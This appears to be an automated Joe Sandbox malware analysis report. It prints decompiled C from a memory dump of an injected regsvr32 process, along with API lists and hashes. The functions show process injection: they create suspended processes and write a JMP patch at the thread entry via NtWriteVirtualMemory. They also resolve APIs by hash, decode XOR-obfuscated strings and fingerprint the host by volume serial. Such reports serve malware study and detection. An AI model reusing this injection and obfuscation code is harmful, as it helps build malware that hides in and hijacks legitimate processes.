Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: AllocateChangeCloseCurrentDirectoryErrorFindHeapLastMetricsNotificationProcessSystemVersionWindows
String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
API String ID: 3131805607-2706916422
Opcode ID: 5d11e90171dccb7d9d2fb60da1fe73f037048aa94f0222b0a6ae624d11e0ef3f
Instruction ID: 8c81333d507a10db553a6e2707ac18f4d146f80d8d7babb8af5061610b56ba9f
Opcode Fuzzy Hash: 5d11e90171dccb7d9d2fb60da1fe73f037048aa94f0222b0a6ae624d11e0ef3f
Instruction Fuzzy Hash: 5C918E71B41605EFD704EB70D848FEAB7E9FF08340F2445AAE51AD7240EB70AA548FA1

Uniqueness

Uniqueness Score: -1.00%

Function 02BCD9DE Relevance: 6.1, APIs: 4, Instructions: 89
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E02BCD9DE(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				struct _CONTEXT _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t33;
				void* _t57;
				long _t59;
				void* _t62;
				void** _t65;
				void* _t66;

				_t65 = __edx;
				_t57 = __ecx;
				_t66 = 0;
				if(E02BCD309(__ecx, __edx, __edx, 0) != 0) {
					_t33 = E02BCD538( *((intOrPtr*)(__edx)), _a4); // executed
					_t66 = _t33;
					if(_t66 != 0) {
						E02BC8F63( &_v744, 0, 0x2cc);
						_v744.ContextFlags = 0x10002;
						if(GetThreadContext(_t65[1],  &_v744) != 0) {
							_t62 = _v744.Eax;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t59 = 5;
							_v23 = _t66 - _t62 - _a4 + _t57 + 0xfffffffb;
							_v8 = _t59;
							_v16 = _t62;
							if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t65, _v744.Eax,  &_v24, _t59,  &_v8) < 0) {
								L6:
								_t66 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, _v12,  &_v28) < 0) {
									goto L6;
								}
							}
						}
					}
				}
				E02BCD47C();
				return _t66;
			}

0x02bcd9ea
0x02bcd9ec
0x02bcd9ee
0x02bcd9f7
0x02bcda02
0x02bcda07
0x02bcda0b
0x02bcda1f
0x02bcda27
0x02bcda48
0x02bcda4e
0x02bcda56
0x02bcda64
0x02bcda6a
0x02bcda6b
0x02bcda77
0x02bcda7e
0x02bcda8e
0x02bcdace
0x02bcdace
0x02bcdaad
0x02bcdaad
0x02bcdacc
0x00000000
0x00000000
0x02bcdacc
0x02bcda8e
0x02bcda48
0x02bcda0b
0x02bcdad0
0x02bcdadb

APIs

Part of subcall function 02BCD309: LoadLibraryW.KERNEL32 ref: 02BCD403

Part of subcall function 02BCD538: NtCreateSection.NTDLL(02BCDA07,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 02BCD5AA
Part of subcall function 02BCD538: RegisterClassExA.USER32(?), ref: 02BCD5FE
Part of subcall function 02BCD538: CreateWindowExA.USER32 ref: 02BCD629
Part of subcall function 02BCD538: DestroyWindow.USER32(00000000), ref: 02BCD634
Part of subcall function 02BCD538: UnregisterClassA.USER32 ref: 02BCD63F

Part of subcall function 02BC8F63: memset.MSVCRT ref: 02BC8F75

GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 02BCDA40
NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 02BCDA89
NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 02BCDAA6
NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 02BCDAC7

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: MemoryVirtual$ClassCreateProtectWindow$ContextDestroyLibraryLoadRegisterSectionThreadUnregisterWritememset
String ID:
API String ID: 1578692462-0
Opcode ID: 2ad05b7ada8f162bb1094847872c9ba4e6efb0c4f86290e9a451fea67a048e24
Instruction ID: 9d1f799e81e1335c7b446db89c9f024b9c56619e1d4f8a161305563a4604755f
Opcode Fuzzy Hash: 2ad05b7ada8f162bb1094847872c9ba4e6efb0c4f86290e9a451fea67a048e24
Instruction Fuzzy Hash: 8F312F76A0110AAFDB11DFA5CD44FEEB7B8EF04354F2441AAE615E3150E770EA14CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02BCBAF6 Relevance: 6.1, APIs: 4, Instructions: 66
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E02BCBAF6(void* __ecx, void* __edx) {
				void* _v304;
				void* _v308;
				intOrPtr _v312;
				signed int _t16;
				signed int _t17;
				intOrPtr _t30;
				void* _t33;
				void* _t43;
				void* _t45;

				_t33 = __edx;
				_v304 = __ecx;
				_t16 = CreateToolhelp32Snapshot(2, 0);
				_t45 = _t16;
				_t17 = _t16 | 0xffffffff;
				if(_t45 != _t17) {
					E02BC8F63( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t45,  &_v304) != 0) {
						do {
							_t43 = _v312( &_v308, _t33);
						} while (_t43 != 0 && Process32Next(_t45,  &_v308) != 0);
						FindCloseChangeNotification(_t45);
						_t17 = 0 | _t43 == 0x00000000;
					} else {
						_t30 =  *0x2bdf8d0; // 0x483f8c0
						 *((intOrPtr*)(_t30 + 0x30))(_t45);
						_t17 = 0xfffffffe;
					}
				}
				return _t17;
			}

0x02bcbb0e
0x02bcbb10
0x02bcbb14
0x02bcbb17
0x02bcbb19
0x02bcbb1e
0x02bcbb2d
0x02bcbb35
0x02bcbb49
0x02bcbb59
0x02bcbb63
0x02bcbb67
0x02bcbb84
0x02bcbb8b
0x02bcbb4b
0x02bcbb4b
0x02bcbb51
0x02bcbb56
0x02bcbb56
0x02bcbb49
0x02bcbb94

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 02BCBB14

Part of subcall function 02BC8F63: memset.MSVCRT ref: 02BC8F75

Process32First.KERNEL32(00000000,?), ref: 02BCBB44
Process32Next.KERNEL32(00000000,?), ref: 02BCBB77
FindCloseChangeNotification.KERNELBASE(00000000), ref: 02BCBB84

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32memset
String ID:
API String ID: 2518216231-0
Opcode ID: c9e43896b9af3f1127439e4d3d50ca245be93c032d3952982dc127b0922a2f9b
Instruction ID: b93d9d7a00ef743897550269a582fae7c15cf93c4e0dc61eef1f0585c50d7e56
Opcode Fuzzy Hash: c9e43896b9af3f1127439e4d3d50ca245be93c032d3952982dc127b0922a2f9b
Instruction Fuzzy Hash: 8711C8725442419FC310EE68EC49EAB77ECFF88264F280A5DF525C7184EB21D5048772

Uniqueness

Uniqueness Score: -1.00%

Function 02BCEF38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E02BCEF38(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E02BCE34A( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E02BCA5D0( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

0x02bcef41
0x02bcef43
0x02bcef46
0x02bcef49
0x02bcef4f
0x02bcefac
0x00000000
0x02bcefac
0x02bcef51
0x02bcef5c
0x02bcef5f
0x02bcef64
0x02bcef69
0x02bcef6c
0x02bcef6e
0x02bcef71
0x02bcef74
0x02bcef79
0x00000000
0x00000000
0x00000000
0x00000000
0x02bcef7b
0x02bcef7b
0x02bcef8d
0x02bcef9a
0x02bcef9e
0x00000000
0x00000000
0x02bcefa0
0x02bcefa3
0x02bcefa4
0x02bcefaa
0x00000000
0x00000000
0x00000000
0x02bcefaa
0x02bcefc1
0x02bcefc6
0x02bcefca
0x00000000
0x02bcefd6
0x02bcefd6
0x02bcefd8
0x02bcefd8
0x02bcefde
0x00000000
0x00000000
0x02bcefe4
0x02bcefe8
0x02bcefec
0x00000000
0x00000000
0x00000000
0x02bcefec
0x02bceff2
0x02bceffa
0x02bcefff
0x02bcf002
0x02bcf002
0x02bcf004
0x02bcf008
0x02bcf010
0x00000000
0x00000000
0x02bcf014
0x02bcf01c
0x00000000
0x00000000
0x00000000
0x02bcf01c

APIs

LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 02BCF008
GetProcAddress.KERNEL32(00000000,?), ref: 02BCF014

Strings

.dll, xrefs: 02BCF004, 02BCF007

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll
API String ID: 2574300362-2738580789
Opcode ID: 1ba10ac35c1eef73f28a3ae4b6258811414b16edcde75e60831a339b984afe39
Instruction ID: 5a56b2c11cf08226f389d67ec54edc46b25d2be00883a33f589a886f9f956b66
Opcode Fuzzy Hash: 1ba10ac35c1eef73f28a3ae4b6258811414b16edcde75e60831a339b984afe39
Instruction Fuzzy Hash: D231B031A00255DBDB24DF69D890BAEBBE5EF44308F3844ADD805E7341E730D991CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC778 Relevance: 6.1, APIs: 4, Instructions: 83
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E02BCC778(WCHAR* __ecx, WCHAR* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				intOrPtr _t23;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				E02BC8F63(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0x2bdf8d0; // 0x483f8c0
				 *((intOrPtr*)(_t23 + 0xbc))( &_v528,  &_v12);
				lstrcpynW(__edx,  &_v528, 0x100);
				_t27 = E02BC9F85(_t44, 0x978);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E02BC8D9A( &_v16);
				_t33 = E02BCA5E9(_t43);
				E02BC9FE4( &(_t43[E02BCA5E9(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E02BCA5E9(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E02BCE34A(_t43, E02BCA5E9(_t43) + _t40, 0);
			}

0x02bcc778
0x02bcc781
0x02bcc78d
0x02bcc793
0x02bcc795
0x02bcc79d
0x02bcc7ab
0x02bcc7b0
0x02bcc7bf
0x02bcc7ca
0x02bcc7d7
0x02bcc7f1
0x02bcc7f6
0x02bcc7f8
0x02bcc7ff
0x02bcc80f
0x02bcc820
0x02bcc82a
0x02bcc832
0x02bcc839
0x02bcc83c
0x02bcc859

APIs

Part of subcall function 02BC8F63: memset.MSVCRT ref: 02BC8F75

lstrcpynW.KERNEL32(?,?,00000100), ref: 02BCC7BF
GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 02BCC7F1

Part of subcall function 02BC9FE4: _vsnwprintf.MSVCRT ref: 02BCA001

lstrcatW.KERNEL32(?,00000114), ref: 02BCC82A
CharUpperBuffW.USER32(?,00000000), ref: 02BCC83C

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
String ID:
API String ID: 455400327-0
Opcode ID: ec7b193b4a671e66593ec0d636bd51774a347f3a659fb0b70b7af5c577ff7944
Instruction ID: 0832b8278d762d42b35838cb6a98e1ff2c39e5d2abb53053ee66ffd4a380f432
Opcode Fuzzy Hash: ec7b193b4a671e66593ec0d636bd51774a347f3a659fb0b70b7af5c577ff7944
Instruction Fuzzy Hash: BF2110B2941218BFE714ABA4DC49FEE77ADEF84350F2045A9F506D7181EA74AA048B60

Uniqueness

Uniqueness Score: -1.00%

Function 02BC8BCD Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 94
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E02BC8BCD(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v28;
				short _v44;
				void* _t38;
				intOrPtr _t47;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				void* _t58;
				intOrPtr _t59;
				void* _t62;
				void* _t64;
				signed int _t71;
				signed int _t74;
				void* _t76;
				void* _t77;

				_t71 = _a12;
				_t53 = __edx;
				_v8 = __ecx;
				_t74 = _t71;
				if(_t71 >= __edx) {
					L4:
					_t54 = 0x2bdf94e;
					L5:
					_t58 = 0;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsw");
					asm("movsb");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_t38 = 0;
					if(_v28 == 0) {
						L8:
						_t64 = _t38;
						if(_t64 == 0) {
							L10:
							lstrlenW( &_v44);
							return _t54;
						} else {
							goto L9;
						}
						do {
							L9:
							_t19 = _t58 + 0x30; // 0x30
							 *((char*)(_t77 + _t58 - 0x28)) = _t19;
							_t58 = _t58 + 1;
						} while (_t58 < _t64);
						goto L10;
					} else {
						goto L6;
					}
					do {
						L6:
						_t38 = _t38 + 1;
					} while ( *((intOrPtr*)(_t77 + _t38 - 0x18)) != 0);
					_t64 = 0xe;
					if(_t38 > _t64) {
						goto L9;
					}
					goto L8;
				}
				_t59 = _a4;
				_a12 = 0x5a;
				while( *((intOrPtr*)(_t74 % _a12 + _t59)) !=  *((intOrPtr*)(_t74 + _v8))) {
					_t74 = _t74 + 1;
					if(_t74 < _t53) {
						continue;
					}
					goto L4;
				}
				_t76 = _t74 - _t71;
				if(_t76 == 0) {
					goto L4;
				}
				_t47 = E02BC8DC9(_t76 + 1); // executed
				_t55 = _t47;
				_v12 = _t55;
				if(_t55 != 0) {
					_t56 = _a4;
					_t62 = _t55 - _t71;
					do {
						 *(_t62 + _t71) =  *(_t71 % _a12 + _t56) ^  *(_t71 + _v8);
						_t71 = _t71 + 1;
						_t76 = _t76 - 1;
					} while (_t76 != 0);
					_t54 = _v12;
					goto L5;
				}
				return 0x2bdf94e;
			}

0x02bc8bd6
0x02bc8bd9
0x02bc8bdb
0x02bc8bde
0x02bc8be2
0x02bc8c05
0x02bc8c05
0x02bc8c0a
0x02bc8c14
0x02bc8c16
0x02bc8c17
0x02bc8c18
0x02bc8c19
0x02bc8c1b
0x02bc8c1f
0x02bc8c20
0x02bc8c21
0x02bc8c22
0x02bc8c24
0x02bc8c25
0x02bc8c2a
0x02bc8c3a
0x02bc8c3a
0x02bc8c3e
0x02bc8c4c
0x02bc8c50
0x00000000
0x00000000
0x00000000
0x00000000
0x02bc8c40
0x02bc8c40
0x02bc8c40
0x02bc8c43
0x02bc8c47
0x02bc8c48
0x00000000
0x00000000
0x00000000
0x00000000
0x02bc8c2c
0x02bc8c2c
0x02bc8c2c
0x02bc8c2d
0x02bc8c35
0x02bc8c38
0x00000000
0x00000000
0x00000000
0x02bc8c38
0x02bc8be4
0x02bc8be7
0x02bc8bee
0x02bc8c00
0x02bc8c03
0x00000000
0x00000000
0x00000000
0x02bc8c03
0x02bc8c5d
0x02bc8c5f
0x00000000
0x00000000
0x02bc8c65
0x02bc8c6a
0x02bc8c6c
0x02bc8c72
0x02bc8c7d
0x02bc8c80
0x02bc8c82
0x02bc8c92
0x02bc8c95
0x02bc8c96
0x02bc8c96
0x02bc8c9b
0x00000000
0x02bc8c9b
0x00000000

APIs

lstrlenW.KERNEL32(?,00000138,?,02BDCA88), ref: 02BC8C50

Strings

GetCurrentPath, xrefs: 02BC8C0A
Z, xrefs: 02BC8BE7

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: GetCurrentPath$Z
API String ID: 1659193697-4005238709
Opcode ID: f8749e5188d285833f4e992c1378027c99e169a144b6040c500d72ebfff8d72e
Instruction ID: cc242e261a2acd9f299ce6153138450411524619639283de91ee3e29ebe34253
Opcode Fuzzy Hash: f8749e5188d285833f4e992c1378027c99e169a144b6040c500d72ebfff8d72e
Instruction Fuzzy Hash: EC212331B06685AFCB06DFACC8801AFBB66FF8D210B3804BDDA45AB201D730D9468790

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC986 Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E02BCC986(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E02BC8DC9(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E02BC8DDF( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}

0x02bcc989
0x02bcc98a
0x02bcc991
0x02bcc999
0x02bcc99d
0x02bcc9a6
0x02bcc9ec
0x02bcc9ec
0x02bcc9b3
0x02bcc9bb
0x02bcc9bd
0x02bcc9c3
0x02bcc9dc
0x00000000
0x02bcc9de
0x02bcc9e3
0x00000000
0x02bcc9e9
0x02bcc9c5
0x02bcc9c5
0x02bcc9c5
0x02bcc9c5
0x02bcc9c3
0x02bcc9f2

APIs

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,02BC0000,00000000,00000000,?,02BCCA07,00000000,00000000,?,02BCCA30), ref: 02BCC9A1
GetLastError.KERNEL32(?,02BCCA07,00000000,00000000,?,02BCCA30,00001644,?,02BCE053), ref: 02BCC9A8

Part of subcall function 02BC8DC9: RtlAllocateHeap.NTDLL(00000008,?,?,02BC9793,00000100,?,02BC661B), ref: 02BC8DD7

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,02BCCA07,00000000,00000000,?,02BCCA30,00001644,?,02BCE053), ref: 02BCC9D7

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: InformationToken$AllocateErrorHeapLast
String ID:
API String ID: 2499131667-0
Opcode ID: 97bf738f96e0f7c0d5822830ce441f7005eb36f48e47576b99a7f666fa6ef830
Instruction ID: b78051ecccd82fb4b5c4e1d899212c1bdb8b1d6d67fc9efff4b5cf3b78d3b5fb
Opcode Fuzzy Hash: 97bf738f96e0f7c0d5822830ce441f7005eb36f48e47576b99a7f666fa6ef830
Instruction Fuzzy Hash: E4018F72A01114BF8B266BA5EC49E9B7FACDF556A072004AEF60AD2101E760DD0087B0

Uniqueness

Uniqueness Score: -1.00%

Function 02BCBE10 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E02BCBE10(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;

				E02BC8F63(__edx, 0, 0x10);
				E02BC8F63( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}

0x02bcbe21
0x02bcbe2e
0x02bcbe36
0x02bcbe52
0x02bcbe58
0x02bcbe5f

APIs

Part of subcall function 02BC8F63: memset.MSVCRT ref: 02BC8F75

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 02BCBE52

Strings

D, xrefs: 02BCBE36

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcessmemset
String ID: D
API String ID: 2296119082-2746444292
Opcode ID: 65b6cfe32eaf3be25c27ec3010fe97144b8719a4866702c85716324f18afc1cb
Instruction ID: f7c1f5f31cd653b6fb1ffc1efa772fa14457723948b032978b33f7eda2dacaf6
Opcode Fuzzy Hash: 65b6cfe32eaf3be25c27ec3010fe97144b8719a4866702c85716324f18afc1cb
Instruction Fuzzy Hash: 5DF065F16442487EF720E665CC0AFBF36ADDB81710F600565BB09EB1C0E6A0AD0586B5

Uniqueness

Uniqueness Score: -1.00%

Function 02BCD889 Relevance: 3.1, APIs: 2, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E02BCD889(intOrPtr __edx) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				signed int _t45;
				void* _t49;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t59;
				void* _t62;
				intOrPtr _t63;
				signed int _t67;
				intOrPtr _t69;
				void* _t70;
				intOrPtr _t86;
				char _t87;
				void* _t88;

				_v16 = _v16 & 0x00000000;
				_v20 = __edx;
				_t86 = 0;
				_t37 = E02BCD7CD( &_v16, __edx);
				_t87 = _t37;
				_v24 = _t87;
				_t89 = _t87;
				if(_t87 == 0) {
					return _t37;
				}
				_t38 =  *0x2bdf8d4; // 0x483fc00
				E02BCB6E3( &_v80,  *((intOrPtr*)(_t38 + 0xac)) + 7, _t89);
				_v12 = _v12 & 0;
				_t67 = _v16;
				if(_t67 == 0) {
					L21:
					E02BC8DDF( &_v24, 0);
					return _t86;
				}
				while(_t86 == 0) {
					_t69 = 0;
					_v8 = 0;
					while(_t86 == 0) {
						E02BC8F63( &_v40, _t86, 0x10);
						_t88 = _t88 + 0xc;
						_t49 = E02BCBE10( *((intOrPtr*)(_t87 + _v12 * 4)),  &_v40); // executed
						_t94 = _t49;
						if(_t49 >= 0) {
							_t56 = E02BCD9DE(E02BC6297,  &_v40, _t94, _v20); // executed
							if(_t56 != 0) {
								_t59 =  *0x2bdf8d0; // 0x483f8c0
								_t70 =  *((intOrPtr*)(_t59 + 0xd0))(0, 0, 0,  &_v80);
								if(_t70 != 0) {
									GetLastError();
									_t62 = E02BCDADC( &_v40);
									_t63 =  *0x2bdf8d0; // 0x483f8c0
									if(_t62 != 0) {
										_push(0xea60);
										_push(_t70);
										if( *((intOrPtr*)(_t63 + 0x2c))() == 0) {
											_t86 = _t86 + 1;
										}
										_t63 =  *0x2bdf8d0; // 0x483f8c0
									}
									FindCloseChangeNotification(_t70);
								}
								_t69 = _v8;
							}
						}
						if(_v40 != 0) {
							if(_t86 == 0) {
								_t54 =  *0x2bdf8d0; // 0x483f8c0
								 *((intOrPtr*)(_t54 + 0x110))(_v40, _t86);
							}
							_t50 =  *0x2bdf8d0; // 0x483f8c0
							 *((intOrPtr*)(_t50 + 0x30))(_v36);
							_t52 =  *0x2bdf8d0; // 0x483f8c0
							 *((intOrPtr*)(_t52 + 0x30))(_v40);
						}
						_t69 = _t69 + 1;
						_v8 = _t69;
						if(_t69 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t67 = _v16;
					_t45 = _v12 + 1;
					_v12 = _t45;
					if(_t45 < _t67) {
						continue;
					} else {
						break;
					}
					do {
						goto L20;
					} while (_t67 != 0);
					goto L21;
				}
				L20:
				E02BC8DDF(_t87, 0xfffffffe);
				_t87 = _t87 + 4;
				_t67 = _t67 - 1;
			}

0x02bcd88f
0x02bcd898
0x02bcd89b
0x02bcd89d
0x02bcd8a2
0x02bcd8a4
0x02bcd8a7
0x02bcd8a9
0x02bcd9dd
0x02bcd9dd
0x02bcd8af
0x02bcd8c1
0x02bcd8c6
0x02bcd8c9
0x02bcd8ce
0x02bcd9ca
0x02bcd9d0
0x00000000
0x02bcd9d9
0x02bcd8d4
0x02bcd8dc
0x02bcd8de
0x02bcd8e1
0x02bcd8f0
0x02bcd8fb
0x02bcd901
0x02bcd906
0x02bcd908
0x02bcd915
0x02bcd91d
0x02bcd928
0x02bcd933
0x02bcd937
0x02bcd939
0x02bcd942
0x02bcd949
0x02bcd94e
0x02bcd950
0x02bcd955
0x02bcd95b
0x02bcd95d
0x02bcd95d
0x02bcd95e
0x02bcd95e
0x02bcd964
0x02bcd964
0x02bcd967
0x02bcd967
0x02bcd91d
0x02bcd96e
0x02bcd972
0x02bcd974
0x02bcd97d
0x02bcd97d
0x02bcd983
0x02bcd98b
0x02bcd98e
0x02bcd996
0x02bcd996
0x02bcd999
0x02bcd99a
0x02bcd9a0
0x00000000
0x00000000
0x00000000
0x00000000
0x02bcd9a0
0x02bcd9a9
0x02bcd9ac
0x02bcd9ad
0x02bcd9b2
0x00000000
0x00000000
0x00000000
0x00000000
0x02bcd9b8
0x00000000
0x00000000
0x00000000
0x02bcd9b8
0x02bcd9b8
0x02bcd9bb
0x02bcd9c1
